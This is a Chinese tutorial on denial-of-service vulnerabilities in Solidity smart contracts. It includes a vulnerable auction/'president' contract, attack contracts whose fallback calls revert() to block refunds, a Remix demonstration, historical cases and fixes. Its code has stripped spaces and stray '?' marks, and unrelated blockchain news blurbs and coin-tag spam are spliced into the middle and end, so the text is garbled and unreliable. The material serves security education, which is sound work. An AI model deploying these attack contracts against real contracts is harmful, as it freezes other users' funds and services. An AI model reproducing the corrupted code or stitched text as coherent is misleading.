科普 | 深入理解「拒绝服务」漏洞

//...额外的一些ICO功能//重写transfer函数，先检查isFinalizedfunctiontransfer(address_to,uint_value)returns(bool){?require(isFinalized);?super

contractPOC?{addressowner;AuctionauInstance;constructor()?public?{owner=msg.sender;?}modifieronlyOwner(){require(owner==msg.sender);_;?}functionsetInstance(addressaddr)?publiconlyOwner?{?//指向原合约地址auInstance=Auction(addr);?}functionattack()?publiconlyOwner?{auInstance.bid.value(msg.value)();?}??function()?externalpayable{revert();?}}

攻击者先通过攻击合约调用bid()函数向竞拍合约转账成为新的竞拍者currentLeader，然后新的bid()函数被执行进行竞标的时候，当执行到require(currentLeader.send(highestBid))退还以太币操作时，会因为攻击合约的fallback()回退函数执行revert()而无法接收以太币，导致一直为false，其他竞拍者竞拍都会失败，最后攻击合约以较低的以太币赢得竞拍。

针对以上情况，如果需要对外部函数调用的结果进行处理后才能进入新的状态，那么一定要考虑外部调用可能一直失败的情况，也可以添加基于时间的操作，防止外部函数调用一直失败无法满足require判断。

动态 | 人民日报官方微博科普区块链 强调区块链不等于比特币:人民日报官方微博今早发表9图科普区块链。其中涉及区块链的特点有：1、安全；2、不可篡改；3、可访问；4、无第三方。区块链对未来的影响：1、不需繁琐个人证明；2、看病避免反复检查；3、旅行消费更加便捷；4、交易无需第三方。同时强调，区块链不等于比特币。比特币只是区块链技术的一种应用，区块链还有医疗卫生、食品安全、版权保护等诸多应用领域。[2019/10/28]

4.相关案例

4.1演示案例

接下来会对拒绝服务攻击做出详细的演示讲解，以及会附上一个实例进行说明。

下面的合约代码是根据漏洞分析中第三点基于外部调用的进展状态讲的合约改的，正常的操作逻辑是任何出价高于当前合约price的都能成为新的president，合约中存款也会通过transfer()函数转账以太币退还给上一个president，这么看的话是没有任何问题的，但是以太坊是有两种账户类型，外部账户和合约账户，如果发起becomePresident()调用的是外部账户那就是正常的操作，但如果发起becomePresident()调用的是合约账户，并且在合约账户的fallback()函数中恶意的使用revert()等报错的函数，那么其他用户在发起becomePresident()时退还以太币给合约账户时会触发fallback()函数而导致报错，无法再正常进行becomePresident()中的逻辑成为新的president了。

那么我们先来看下存在问题的合约代码，这里我们将合约代码设置为PresidentOfCountry.sol：

pragmasolidity^0.4.19;contractPresidentOfCountry?{addresspublicpresident;?//总统地址uint256price;?//出价functionPresidentOfCountry(uint256_price){?//构造函数，设置初始的价格require(_price>0);price=_price;?//设置初始的价格?}functionbecomePresident()?payable?{?//竞争总统require(msg.value>price);?//支付的以太币必须大于当前总统的竞争费president.transfer(price);??//退还以太币给上一任总统president=msg.sender;???//设置新的总统为竞争成功用户price=price;??????//设置最新的竞争价格?}}

金色财经独家分析 监管机构、媒体、业界提示风险 区块链科普道阻且长:新华社今日发文表示，近来“区块链”类案件频发，不法分子以“投资虚拟货币周期短、收益高、风险低”为借口，取用户信任并诱使其转账进行投资。无独有偶，同日消息，腾讯手机管家安全专家也提醒此类风险，并从技术上提出防建议。在美国，监管机构警示加密货币欺诈现象普遍承诺高收益而不披露潜在风险。金色财经独家分析，不法分子假借新技术之名进行，一方面是抓住民众趋利的心理，一方面反映出区块链科普的欠缺。区块链是新兴科技和底层技术并有改变社会生产关系的潜力，应该进行系统性的科普教育，当前，部分大学已经开始设置了区块链课程，但对于普通民众仍然有科普的需求，人们应该了解到系统和正确的知识，不仅要了解区块链的好，也要明确局限和弊端，以在高收益的诱惑下，保持清醒客观。[2018/4/11]

在编写攻击合约之前，我们先来介绍下智能合约的两种账户类型以及fallback函数。

以太坊中有两种账户类型：

外部账户，也就是用户账户，由私钥控制。合约账户，可执行代码和私有状态，由合约代码控制。回退函数(fallbackfunction)：回退函数是每个合约中有且仅有一个没有名字的函数，并且该函数无参数，无返回值，如下所示：

function()publicpayable{...}

回退函数在以下几种情况中被执行：

调用合约时没有匹配到任何一个函数；没有传数据；智能合约收到以太币。下面就来编写攻击合约，主要有两个重点，一个是外部调用becomePresident，二个就是在回退函数中使用revert。

pragmasolidity^0.4.19;import"./PresidentOfCountry.sol";contractAttack?{functionAttack(address_target)?payable?{?//构造函数，设置目标合约地址，用call进行外部调用becomePresident_target.call.value(msg.value)(bytes4(keccak256("becomePresident()")));?}function?()?payable?{?//回退函数，使用revert报错revert();?}}

在Remix中进行调试查看结果，首先使用账户(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4)设置初始竞争价格并部署漏洞合约代码PresidentOfCountry.sol。

部署好后合约的地址为0xd9145CCE52D386f254917e481eB44e9943F39138，后面在部署攻击合约时需要用到。

点击president可以查看当前竞争者的地址。

使用账户(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4)调用becomePresident并携带1eth，执行成功后再点击president查看，发现新的总统地址已经变成了0X5B的账户。

此时有一个攻击者(0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2)编写了一个攻击者合约Attack.sol，携带2eth并设置_target为PresidentOfCountry合约地址(0xd9145CCE52D386f254917e481eB44e9943F39138)进行部署。

部署好后的攻击合约地址为0xa131AD247055FD2e2aA8b156A11bdEc81b9eAD95，此时再点击president进行查看新总统的地址，发现已经是攻击合约的地址了。

之后如果还有其他用户想来竞争总统位置，就需要大于2eth的价格去调用becomePresident函数，这里有个用户(0xCA35b7d915458EF540aDe6068dFe2F44E8fa733c)想去竞争总统，携带3eth去调用becomePresident，结果发现报错并回退，点击president发现总统地址还是攻击合约没，此时不管是谁使用多少的以太币去调用becomePresident，结果都是失败，该合约已经不能进行正常的操作，这就说明合约受到了拒绝服务攻击。

4.2真实案例

下列代码是实际合约中存在拒绝服务攻击的案例，只写了关键的代码并做了相关的改动。

可以看到合约的关键代码是用作提款操作，但是在提款中有一个判断要提款的金额和用户在该合约中存款的数量是否相等，而并不是大于等于，那么就有可能发生当用户要提出amount数量的代币时，由于各种原因导致balances变动，甚至是用户不想全部提款，从而使得判断条件require(balances==amount);不成立，这时就会造成短暂的拒绝服务攻击。

...functionwithdraw(uint256amount)public{//提款amount数量require(balances==amount);//检查要提款的金额是否等于该用户在合约中的存款?balances-=amount;//修改合约中存款的状态变量?msg.sender.transfer(amount);//转账到用户账户}

而修改的办法就是将判断条件require(balances==amount);修改为require(balances>=amount);就可以了。

4.3历史案例

在历史上，2016年2月6日至8日，在游戏KotET(KingogtheEtherThrone)的「TurbulentAge」期间，就遭受到了拒绝服务攻击，导致部分角色的补偿和未接收款项无法退回玩家的钱包中。

同年6月，GovernMental合约也遭受到了拒绝服务攻击，当时1100个以太币通过使用250万个gas交易而获得，这笔交易超出了合约能负荷的gas上限，从而导致交易暂停。

相关的还有Fomo3D等的拒绝服务攻击。

5.解决办法

通过上面的讲解，我们可以发现拒绝服务攻击在智能合约中的影响也是非常严重的，所以针对拒绝服务攻击，合约开发者应该针对上面漏洞分析时讲到的三种情况进行相应的代码修改。

比如对于外部操作的映射或者数组循环，需要对长度进行限制等；而对于所有者操作需要考虑合约的非唯一性，不要使得合约因为某个权限账户而导致整个业务瘫痪；基于外部调用的进展状态需要对函数的调用进行异常处理，一般来说内部函数的调用不会造成危害。

如果调用失败也只是会进行回退，而外部调用具有不确定性，我们不知道外部调用者想干什么，如果被攻击者攻击，就可能会造成严重的后果，具体表现为恶意返回执行错误，造成正常代码无法执行，从而造成拒绝服务攻击，那么针对这种开发者就应该加入函数执行异常的处理机制。

总的来说，合约开发者需要考虑合约代码的代码逻辑全面性和缜密性等，这样才能更好的杜绝拒绝服务攻击。

6.参考文献

拒绝服务攻击_百度百科(baidu.com)以太坊智能合约安全入门了解一下(rickgray.me)《智能合约安全分析和审计指南》

标签：RESENTDENTESIceres币能发财吗Elves CenturyDENT价格Genesis